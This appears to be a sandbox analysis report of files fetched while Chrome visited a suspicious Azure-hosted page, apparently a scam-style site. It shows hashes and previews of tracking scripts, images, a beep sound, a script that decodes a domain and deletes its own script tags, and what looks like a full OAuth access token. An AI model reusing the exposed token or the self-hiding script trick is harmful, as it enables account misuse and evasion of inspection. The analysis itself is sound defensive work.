                                                        Preview:..D...)J$.y...P...;.hz.?....&L....... L..........:....DDD...-....... .w............+.j.0...B....D... F8...%.*......&j..i6C`.'L.B.5...[...Q.....o3....Z....o.........;...n/<.)cRg.1I{...H.N...D....~H....1....B.~y=....BB...v....?..X.nZ.q....W.P#.g0...l..U. .&.....y_.R.....Ji.`....mz....D.....X.....nN.....e.....:.~X.>.'..{a.V5.C2.....{..D../..|y...HQ.J..xA./z.O.;.....gP..hZ.]....D....vp..F......}..6%.}..BYR..g6N.....D.F.<2.......0...,+Z..y.YGz....M.Y.........)$z.BE.....D.......x..ve..........m.;.L(e.Fc.u...L....g..J.N...k......5. 4.E..Q...7...{.*k.."X@#..X..D....:....p\,.!.bJ5%....>........VH..$......zu.H.s.X7......~...v.'..!k...~a5...... ..8......D...!....P.jW.h..}..f....B...R.FoW?+d!.....'...r.bFK.........>..>r....q..n.H...T....InF...D...I........!%'.....?...W.0.N.!Lw....D.KV*..Do.=.u.u..m.ji2.1.jX...\#... 4.@.v.......5......D...I....L...h)..*.7p..S..:i....<O.wk.6..( ..bz]....*.a.QE|.....H...&.....U.7.L.r...T..\>D..D...z&...F......}..p...*..AL.,(..,.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1388), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):1388
                                                        Entropy (8bit):5.231846982902703
                                                        Encrypted:false
                                                        SSDEEP:24:cmuRRkN8vGrWh0eTg7PKNTBUQ4Wj0Uh9iQxZGd7MrWrKkIvIHI+0QS4bgy5wB9zD:KG8vGraVTEwTeWHHiQx0d7WWem1SLy5I
                                                        MD5:700410AC54C8CB733A8B0D20BB97B07E
                                                        SHA1:45ED5160B6F68783449455B9761C39FEEF492DF1
                                                        SHA-256:63438AC53941D537540DD5687AB8C1F1319509A2F6C419731D5E21CD3A850796
                                                        SHA-512:90A089D9B1269391396D89E7F56D4809A9FB5EB2B838F8E088DA180ECE01A5A2AEB0A05F2EF97E97CE93B9FE5DCBE5DA114FA2AFE8B4C5ED0F7EE60DAF363B5C
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:!function(){"use strict";var t,e=window.location,i=window.document,n=i.getElementById("plausible"),a=n.getAttribute("data-api")||(u=(t=(t=n).src.split("/"))[0])+"//"+(t=t[2])+"/api/event";function o(t,e){t&&console.warn("Ignoring Event: "+t),e&&e.callback&&e.callback()}function r(t,r){if(/^localhost$|^127(\.[0-9]+){0,2}\.[0-9]+$|^\[::1?\]$/.test(e.hostname)||"file:"===e.protocol)return o("localhost",r);if(window._phantom||window.__nightmare||window.navigator.webdriver||window.Cypress)return o(null,r);try{if("true"===window.localStorage.plausible_ignore)return o("localStorage flag",r)}catch(t){}var l={},s=(l.n=t,l.u=e.href,l.d=n.getAttribute("data-domain"),l.r=i.referrer||null,r&&r.meta&&(l.m=JSON.stringify(r.meta)),r&&r.props&&(l.p=r.props),new XMLHttpRequest);s.open("POST",a,!0),s.setRequestHeader("Content-Type","text/plain"),s.send(JSON.stringify(l)),s.onreadystatechange=function(){4===s.readyState&&r&&r.callback&&r.callback()}}var l=window.plausible&&window.plausible.q||[];window.pl
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):1043
                                                        Entropy (8bit):5.945652425878935
                                                        Encrypted:false
                                                        SSDEEP:24:YRtJSwfdKII2tRtNVpO0uPOlMkK4IGEvHb2Nk:YRpoD2tRtNq0uPOlM34IpvHyNk
                                                        MD5:448ABD27F848DCBEA124FACF3D1BD2E8
                                                        SHA1:323E11F04B96A565734F4C81B3D9E06F030D997B
                                                        SHA-256:130010A9EEB2658A3AF1E4012EFF8982B77C0C14FDA64DB28280D1C7AE08FBBD
                                                        SHA-512:FCDE2FE1E31FCE65432383DEBAE49D6175FEDB433F809E6126E0115E10A5FB961C9E19E132388BE7BC2D882C1A9EA68B6FBF057FE6A200CD129B67E3A2A46FE5
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://api-preview.luckyorange.com/public-auth
                                                        Preview:{"access_token":"ya29.c.c0ASRK0GZMp8WL_WRueNpZkCT3Jfnhfq_vo-YdGw69ao0UL89JzKaFYkgnceq8VMY5c9NcVqwJy7Krmta6mZ0NnvIC-RQ_OEU4q8jIAD7DlvCR2kPRofJQo67hNFSDL90ZVycHrFNN2sGuUs90lJqXGEMvYMWikNEcTIJbbmNH1cd-jGGfPJRmO2E4Vp3bxFyT3W8pVWGnrwxSW0WeqzWGstULC-3RdLBWX9PkAApUA-efgMTgUEV7Yh5GY0TPJQTFHW6vjtXMeaURSHoB1x-KZabtQuhWlmh2YVG487esuQHsDEfnzfVxCvDjAconi4oXXrRn3KYJKyw5komHSCZRkLfdfQSt09hLNRzPv3vy5scf4xlc-KWUIHvSLsCBT389AfB3xhl10xkdaFqdr8-4oJRtnQ88UuxS_rFne07X0OVh7JpFw6-ef0QkUbFxUsuov2ikB-ps16XaseQMn5_xIsdyaewUUF7XsgMoWw6YkxfgjejrwnJljOpWa0_I9w5ldy9yg7WI-Zhq5tvnzz68jzytU0F4Z1sfW93yR9n8qWvrm3q6236bFkq-jruiVF-8cz8kq9qoVrahI2n1IZ74qneketxr7OIV9hOVSijaqusvQg7azMcuwkRVtw4hU-qMud7y1OWhy6f61dJoRF0wOeOb50MWQn0B5cqiXUpMYxZ3o6iFmfRUQYr3ynRybeh8uv9WU8mi0FSeb3YqS6pdFa7eowWj_hxfghvgbfdvkBZYMv2WIcFJaloS-zIwIbFfZWn6_h5hlk3QjVRdz2RW2rXu1t2x_c8B6z_nOtc-z7wO2moQa-BuUrSvvvd6feFmp5kfjhyp5UYRgyV5urib2kWFqIht6F34yVW0kIcf542Ul4IbwhtWjQw8oUza92gjbs6hU6Z_rhUfXOdk_Sywmv8s_nl3w5eBhy8svmMihpuWeknJfkbqSyVWeZ2zbni57m1_duOqm41rMu
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):133
                                                        Entropy (8bit):5.102751486482574
                                                        Encrypted:false
                                                        SSDEEP:3:yLRgQyBdwJHMVaFfAYbkwChVYuSuWLpKHpRzsIkMKN:yLnaw9n9AYY3bYuS/i1suKN
                                                        MD5:FEA7FBF2C619FD4B7716FCAA64070C6C
                                                        SHA1:F192732937981A26F526B7C1293A2AE13BC59A22
                                                        SHA-256:DF9690FEA031319DE38A437CB6D393026C4AAE70642ED394C4254ED64F035B26
                                                        SHA-512:145C293C29DC95F829B71B3E7378FAC6A17D3081F9D2E17A986BED2CC5F07F4BC35E791010264C841F02057A64A9F297D4F62335FEF59F0C237A541599EDB6C3
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://userstatics.com/get/script.js?referrer=https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE
                                                        Preview:document.querySelectorAll("script").forEach(e=>{new RegExp(atob("dXNlcnN0YXRpY3MuY29t")).test(e.src)&&document.body.removeChild(e)});
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 128 x 128, 1-bit colormap, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):722
                                                        Entropy (8bit):7.434007974065295
                                                        Encrypted:false
                                                        SSDEEP:12:6v/73lmhE/6TZoOuuO9bHYs8qJgwvCHa2eYZhJHobEK9trxxqpx8lOOColpjrYUA:o2E/6KphbR8mCHsYpHc3ipGl6olpB9yx
                                                        MD5:42D8F2CC1AE5759C2369F255F36EBC03
                                                        SHA1:8E592162EEC14E72D0A751D714A641DBECE91F6B
                                                        SHA-256:31C6DBE9D867436244F38566ADAD57E3870F4C8489C6804280EB564BFAC5C1BD
                                                        SHA-512:4B5BDCEC4F3D6901CD4352F81D239CE418B21D8445CD704002D2A59F4AD2DBD15DD6653F65365BD99FADCB6DF9187466F30A2543E0456EFBB869B3281C8A1E23
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/images/vsc.png
                                                        Preview:.PNG........IHDR....................PLTE.......g......tRNS.@..f....pHYs................eIDATx^..n.0..)..:E}.......+e.p....c^IA.....Y..a.<Q.....l..(...r..^....p....3.[.uI.....w..U...#./,..*.a\ .*"."t*dmz.;ps.#u....0..Xb....R....~.....8u0..{\...eAl.z. ...>.B.4.M...e..A...`...t..(g).......@....`.g..b.Y./....,......D...~..<..M....8.Y.;|.../c..q...@_.qO..G.....Y@..&.be...../....yN....:x..8.....<W.........*.e......^^ .4..V..9.......v..>.....*.^7.~.._.O.o.@...o).....i...&........`..P.]...@.(....{.*......M......;...o..P...H.9yzv8..A.....}(#@..e...[.5.Nu.0..V.#6 I..8.4-.4-.{...G.R..I...%.)....+T...L..2..lK.6.....G.rlS.m.66..ls......a.a.;.6^....Q`...'v..d...kv...h.......}....N..g..lN....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 1055 x 899, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):73052
                                                        Entropy (8bit):7.8433091874252225
                                                        Encrypted:false
                                                        SSDEEP:1536:ZA0n72I1IHRp0wwsG38rzZWFcvRMT/EYoiX4eA7:Z9Nop0wLGMrtWQRMLEYoiX0
                                                        MD5:28CCE20DB49BD94D0F575AAD0EE20D3C
                                                        SHA1:EDAFD2117F811AE322BD148AF05DBFA9F80137DE
                                                        SHA-256:6622BD287F52582FFA881E35FB0E7BDE40DC2D92694C0F5C04120D565F1CBB2F
                                                        SHA-512:82FD3F40E3F2FF4943B3BA30A55987393BF279C406CF1539B344F74A05C4265D8248D7B122A56B7056EAC33A703703CDADD186FBC819B53AC54522C5BBC927DB
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/images/bx1.png
                                                        Preview:.PNG........IHDR..............;......pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 56 kbps, 44.1 kHz, Monaural
                                                        Category:downloaded
                                                        Size (bytes):8405
                                                        Entropy (8bit):6.704045838496729
                                                        Encrypted:false
                                                        SSDEEP:192:aXnUfcyMlDiVE9UQuKCCy6BAtdHtv8/okoR4X:WUfcVlDiVFKByZtdHwCE
                                                        MD5:8618FBB0911E3B8FC96725DEE8BFD81F
                                                        SHA1:1BBCB78922946D0CF18FBF3A9E092E36453EB767
                                                        SHA-256:0589BE7715D2320E559EAE6BD26F3528E97450C70293DA2E1E8CE45F77F99AB1
                                                        SHA-512:5446BA0132541BE0100F0CE418A4349C2ED6181FD9816D6C30B213E4E773CE6BD979789C422CFAECE228B296B79A0F4F36B97BDA8117A09F84416662A4513A55
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/media/beep.mp3:2f868e97af66c7:0
                                                        Preview:ID3......?TPE1.......SoundJay.com Sound Effects.TSSE.......Lavf54.29.104...@..................Info.......'.. ............%%,,,22888???EELLLRRYYY__eeelllrryyy.....................................................Lavf54.29.104........$.........................P..........!/.RD......j..t.j..t.j..t.j..t.j..t.j..t.j..t.j.....%J....%J....%J...........E..@.?...y.........n...................x>|.@s.......M........E........A......B..........@.f.......s.....R.7..$......f...9@....m.m....@........ ..L... .)x......b.fe...D........ 0..M.M..Ba]..c.."....Ay.Z..h.....U'......}...............@....... 0M....g!....SX.(...G].:....$..^".. ..,d.$.Y..'..,...3Q.K.S3...R. ..).C=....1h}.5..u.p(\..E....&.....<.$...I!0c._F...{.f#...&...=..P.,..*..R.g.j.E...bjuo.....@....D...a......#\%...t.'.......u.......o.Z...(X.r...Dv....J....&..u.....Mn.......)WY...d..*......:.&.Z..R.....O..p.l=....!...dN.:..H.'C...I.9.ME.F...@'..j.?...#.kq.d..gq`..[....Yt.F......?e2..X.....cK...,;...7....2
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):133
                                                        Entropy (8bit):5.102751486482574
                                                        Encrypted:false
                                                        SSDEEP:3:yLRgQyBdwJHMVaFfAYbkwChVYuSuWLpKHpRzsIkMKN:yLnaw9n9AYY3bYuS/i1suKN
                                                        MD5:FEA7FBF2C619FD4B7716FCAA64070C6C
                                                        SHA1:F192732937981A26F526B7C1293A2AE13BC59A22
                                                        SHA-256:DF9690FEA031319DE38A437CB6D393026C4AAE70642ED394C4254ED64F035B26
                                                        SHA-512:145C293C29DC95F829B71B3E7378FAC6A17D3081F9D2E17A986BED2CC5F07F4BC35E791010264C841F02057A64A9F297D4F62335FEF59F0C237A541599EDB6C3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:document.querySelectorAll("script").forEach(e=>{new RegExp(atob("dXNlcnN0YXRpY3MuY29t")).test(e.src)&&document.body.removeChild(e)});
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (32478)
                                                        Category:dropped
                                                        Size (bytes):84817
                                                        Entropy (8bit):5.373777901642572
                                                        Encrypted:false
                                                        SSDEEP:1536:AP1Wk7i6GUHdXXeyQazBu+4HhiO2Id0uJO1z6/A4fGAub0i4ULgGiyz4npa98Hrb:K4UdeJiz6UAIJ8pa98Hrb
                                                        MD5:20C129BEDB4A26DB02FC0F54D026C3F5
                                                        SHA1:093B9D2728788DE24A728742070A348B2848573F
                                                        SHA-256:436ECC90FAB5ED1034B68A4A0E924E0132D93D9E7FB59B4FE23018EB7D9242C1
                                                        SHA-512:1997641A1DBA92AF7C28FE67C14FC3F89C1E49BE14DD8A8903C3C5D4A4AAE6161B00BF37D02EDA6E8B45F88936C0A7871C1D465036D6F1D18C36ED8D419B78DE
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.3",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,functi
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):4042
                                                        Entropy (8bit):4.803112482361263
                                                        Encrypted:false
                                                        SSDEEP:96:ngmnuf3g+hSVy5hxRWXN80GVi2v65lL6YgWcK9L:ngPf7SVuhxwXNNGVi2v65Zs36L
                                                        MD5:7F2FF117FEDEA521BA52A2C5B848126F
                                                        SHA1:E3DE7560DA2228C8EE4A02A7AFD0C064C7CDCEF9
                                                        SHA-256:6EF010FC5DF89CF7A251544FFCFFE86CD32BCD17EFB9C5B22D3B0843B15BC1A4
                                                        SHA-512:B49CF5E92CBD379B0914BFA0F9E7A6C41F2342CFB5E7689D26436D0B586E2A4BF32DF21639785F93FE3849BEB74F41307BC3CA8713004BC7ACD4FBA66FA10ABD
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://settings.luckyorange.com/f6f3e602
                                                        Preview:{"announcements":[],"eventRules":[],"features":{"revertback":true,"chat.preQualification":true,"messenger":false,"surveys.longText":true,"scramble":true,"funnels.visitors":true,"gcs":true,"requireConsentSetting":true,"key-events":true,"bigcommerce-new-app":true,"trial-guard":true,"shopify-new-app":true,"integration::google-analytics::v1":true,"integration::wordpress::v1":true,"integration::shopify::v2":true,"integration::bigcommerce::v1":true,"integrations":true,"integration::hubspot::v1":true,"send-integration-events":true,"integration::custom-notifications::v1":true,"intelligent-fingerprint":true,"trackFrames":true,"rdc":true,"store-resources":true,"paypal":true,"sessionDuration":true,"email-reports":true,"integration::zapier::v1":true,"export-button":true,"integration::square::v1":true,"shopify-checkout-pixel":true,"multiQuestionSurvey":true,"plan-pricing-page-variant":true,"conversational-discovery":true,"onboarding-benchmark":true,"recommend-plan-from-trial":true,"integration::opt
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 12955
                                                        Category:downloaded
                                                        Size (bytes):4678
                                                        Entropy (8bit):7.95886388935303
                                                        Encrypted:false
                                                        SSDEEP:96:oh/oZIFjyNZXLVy3bCc58GzKwIS6GyShxRcv7OogGgdLUv1by5EH2NB2t:8/cH5wbC0LzKwI5GLRcv7ObGCLU9GO8C
                                                        MD5:2E76F2975071A8EB95D665A06B06CAE4
                                                        SHA1:B114072AED8F53A4586F0AF59D9BCA74B59AB76F
                                                        SHA-256:396ED9BA1FC0306C7BCAB1B1265F0DC273F0E83661C49337AC053DC2DA3B8378
                                                        SHA-512:7F654277E187B5D6008CF03805C965FA28B97890B6EDEDA4259D8AB1DD487BB02F8F6FD9DECE035D1C632BC4745BA23E358B7BBB7F0A036F70FECEF7F5D273B7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://tools.luckyorange.com/core/lo.js?site-id=f6f3e602
                                                        Preview:...........Z.s.8..W$.....I.f.aT...['v.3{W.h]0.Y.P....d...5..^I.&?\....n.....i)..).........=..d..b,'.....YV..h.E.L.Z.............)5...P|Z(m.!M.15.,RA....3Z...j..I..sO.s......y.?m...T..c..0....q.....PYV.....)...b.Iq..Bh...VB.s..].".q/L......+.VJ7;e..,.BM{7.........uct&........c.H7/E.....[......V..zZ..k.......`.........>(1D.s.e.n..'1.._...N.#UqE\..7.e.......8@...Zx...-q....,A..K+d...IQ....z..O0....L...@.~.f.d$.]...v.hW.+....F....0. ...vj.H.....Z.EL.3^\=.ZX..h......$.[.g.?.kou.m.jm8..\.......#.....*F.+..$P.g.9..~\...Q..&.kU..O.0.t........0.\&b(jk.#S..q...a...<...T..N.q.9>...?"6...0R....L......b.c.....sQ,x"zZ...HC.[..ZBd-k..D..:.1.._0.I..)!j...J.Ye..._..k|,&...P.2.E..x.1...Z.e.<K.;.k.....2O-.]...*....n..........s.:ok...x&6..`,.....>`...b.g..Wf.u....g.......>;..os..?..t...BD[.....\}..........2..e*.x!x=....a...z.*...N....'.<......L.QV.w..........e.~0.n....]Q.s.?n.U.G....-.....!MB/f.^.Zlx.D..i^..........Z....$.\.......-I?[.../x2....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 218407
                                                        Category:dropped
                                                        Size (bytes):65516
                                                        Entropy (8bit):7.996155379862241
                                                        Encrypted:true
                                                        SSDEEP:1536:zXLRuzTwzCmJzBq6HWZHEAUNqjthIQ85j1MxKVpGL6mPIQKHG:zNuQemJI2oUNK8DMQLGL6mPIQKHG
                                                        MD5:CEB76217AAF3B7CA62D964B6AD16FAB3
                                                        SHA1:4791C2692D5D5B80BC3A0F0A25A1FD03F9DD8CAD
                                                        SHA-256:AC0BA71D34AFB80E87A80599EE8289258EEC91EC8B4B3B0A829C169EC4B0FF95
                                                        SHA-512:1468DE928760F88F1B0A4044F1D963EAD03DC58DD127705BE0EEAD8DFFE9D1E21F9BC186467504FACF359821A0AB0B2696317275D40C1482CF13C292B074B544
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.............F. .*,....Y(..t..qeI.V...%..Y...d....T.Lr>...^.o.`...._...M.."..yA..Y%....q..@"......q.ge..Q....j.f.e.u.N.t....._...c..(gUn.+.;.m.d)..L.....LX..Y.'..Q..<.(...sR?......'...2K...^rw..o...Y..Yq.A...K.n7...n.t.e>...Zq.>..!v...8..2`.Ti.....P.a...p...S..<...c;......_...f.a."...........>...2.|.E3...U..,...L~.V..P..XH.Y.e...S......*m....3.dM0.E.s7.y._r.>K...o..4.S.|..*uSZ......+.Q..O....{..^x...|syXe"JO...g!.u...i.._.H.,J..........e...^..2...a..[.>.\fS......__.0{.n.K..(8.{.-.T.!|=.VJMY....v..n.RUH...0.A..c.......'.......q1...>........Q{1.....i./.6o......{.%S....G-..a....,..hG.+.......^...Y...g.6.6.Df..~..X..,...^..........,..q.AgpP... H..+~......d..^...E....".Lz..@|...Q..m.&.._...6b>....@...D......=......`...T.@..d..A...o....LR..S.. .Q.>...zW..[qza1. ..WA..O..R...yyaM.M.."Z.......p!c...^di.T..a.R.y.].."HB>. .."....K ?.t..i4.....#.E#.../.L,.....$.W..8.g8.N.,x...;....2>u-G...D.T.ra...u=.....h.^.X...$!.o.(..2.G..Z0.....Y...r._
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1043
                                                        Entropy (8bit):5.945652425878935
                                                        Encrypted:false
                                                        SSDEEP:24:YRtJSwfdKII2tRtNVpO0uPOlMkK4IGEvHb2Nk:YRpoD2tRtNq0uPOlM34IpvHyNk
                                                        MD5:448ABD27F848DCBEA124FACF3D1BD2E8
                                                        SHA1:323E11F04B96A565734F4C81B3D9E06F030D997B
                                                        SHA-256:130010A9EEB2658A3AF1E4012EFF8982B77C0C14FDA64DB28280D1C7AE08FBBD
                                                        SHA-512:FCDE2FE1E31FCE65432383DEBAE49D6175FEDB433F809E6126E0115E10A5FB961C9E19E132388BE7BC2D882C1A9EA68B6FBF057FE6A200CD129B67E3A2A46FE5
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"access_token":"ya29.c.c0ASRK0GZMp8WL_WRueNpZkCT3Jfnhfq_vo-YdGw69ao0UL89JzKaFYkgnceq8VMY5c9NcVqwJy7Krmta6mZ0NnvIC-RQ_OEU4q8jIAD7DlvCR2kPRofJQo67hNFSDL90ZVycHrFNN2sGuUs90lJqXGEMvYMWikNEcTIJbbmNH1cd-jGGfPJRmO2E4Vp3bxFyT3W8pVWGnrwxSW0WeqzWGstULC-3RdLBWX9PkAApUA-efgMTgUEV7Yh5GY0TPJQTFHW6vjtXMeaURSHoB1x-KZabtQuhWlmh2YVG487esuQHsDEfnzfVxCvDjAconi4oXXrRn3KYJKyw5komHSCZRkLfdfQSt09hLNRzPv3vy5scf4xlc-KWUIHvSLsCBT389AfB3xhl10xkdaFqdr8-4oJRtnQ88UuxS_rFne07X0OVh7JpFw6-ef0QkUbFxUsuov2ikB-ps16XaseQMn5_xIsdyaewUUF7XsgMoWw6YkxfgjejrwnJljOpWa0_I9w5ldy9yg7WI-Zhq5tvnzz68jzytU0F4Z1sfW93yR9n8qWvrm3q6236bFkq-jruiVF-8cz8kq9qoVrahI2n1IZ74qneketxr7OIV9hOVSijaqusvQg7azMcuwkRVtw4hU-qMud7y1OWhy6f61dJoRF0wOeOb50MWQn0B5cqiXUpMYxZ3o6iFmfRUQYr3ynRybeh8uv9WU8mi0FSeb3YqS6pdFa7eowWj_hxfghvgbfdvkBZYMv2WIcFJaloS-zIwIbFfZWn6_h5hlk3QjVRdz2RW2rXu1t2x_c8B6z_nOtc-z7wO2moQa-BuUrSvvvd6feFmp5kfjhyp5UYRgyV5urib2kWFqIht6F34yVW0kIcf542Ul4IbwhtWjQw8oUza92gjbs6hU6Z_rhUfXOdk_Sywmv8s_nl3w5eBhy8svmMihpuWeknJfkbqSyVWeZ2zbni57m1_duOqm41rMu
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 31 x 30, 4-bit colormap, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):168
                                                        Entropy (8bit):5.414614498746933
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlKhhmtloZN8s02V42/uDlhlMmI/5DUZfm4XM43ialaRAFRFlvHBlv+:6v/lhPemtl6Q2B/6TfI5IZfmYSal86RC
                                                        MD5:ACB05EBCD5F488FC99169CFF02B6DD04
                                                        SHA1:DCA893A7B514503E947A57AA072482A0E0CBA912
                                                        SHA-256:1AB5EF4E7E196CB1FF39DF44E1A0A39F6880B906EF6FD6DA3CFDBB92FFD33115
                                                        SHA-512:13FB028E0B360C36355FBE5D98377548B6008E6939D3AC5296FD20FE7C52359183BFCA7505AD9EF7C8BFE068FB59B91850F86D4C11765746850737174EFF522E
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR.............&......sRGB...,.....pHYs.................PLTE.P!............]2.....tRNS......../...!IDATx.c`..A%..`........1...@......"@M........IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                        Category:dropped
                                                        Size (bytes):1615
                                                        Entropy (8bit):5.262276279096683
                                                        Encrypted:false
                                                        SSDEEP:24:hY6svD+6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z8xDUvS8f:3qD+2+pUAew85zsDUKA
                                                        MD5:A025B421A82CB34CEA13D6026A01FAD0
                                                        SHA1:C8334FC12C9ADBBA04D8ED5DD210952D891FA0DE
                                                        SHA-256:787B1FF80BDAB8833FDE93FAECE5C952D8E90868857DB3AE71E28E70F9BDE197
                                                        SHA-512:0510D4388254F2FD88F144D2DBBAC707C76BA44CD45F91144BFAD391812C6362A28269B1111AF7415DFE65F3A1474DAEB231FD41FA33739E517C7351D360576A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 128 x 128, 1-bit colormap, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):722
                                                        Entropy (8bit):7.434007974065295
                                                        Encrypted:false
                                                        SSDEEP:12:6v/73lmhE/6TZoOuuO9bHYs8qJgwvCHa2eYZhJHobEK9trxxqpx8lOOColpjrYUA:o2E/6KphbR8mCHsYpHc3ipGl6olpB9yx
                                                        MD5:42D8F2CC1AE5759C2369F255F36EBC03
                                                        SHA1:8E592162EEC14E72D0A751D714A641DBECE91F6B
                                                        SHA-256:31C6DBE9D867436244F38566ADAD57E3870F4C8489C6804280EB564BFAC5C1BD
                                                        SHA-512:4B5BDCEC4F3D6901CD4352F81D239CE418B21D8445CD704002D2A59F4AD2DBD15DD6653F65365BD99FADCB6DF9187466F30A2543E0456EFBB869B3281C8A1E23
                                                        Malicious:false
                                                        Reputation:low
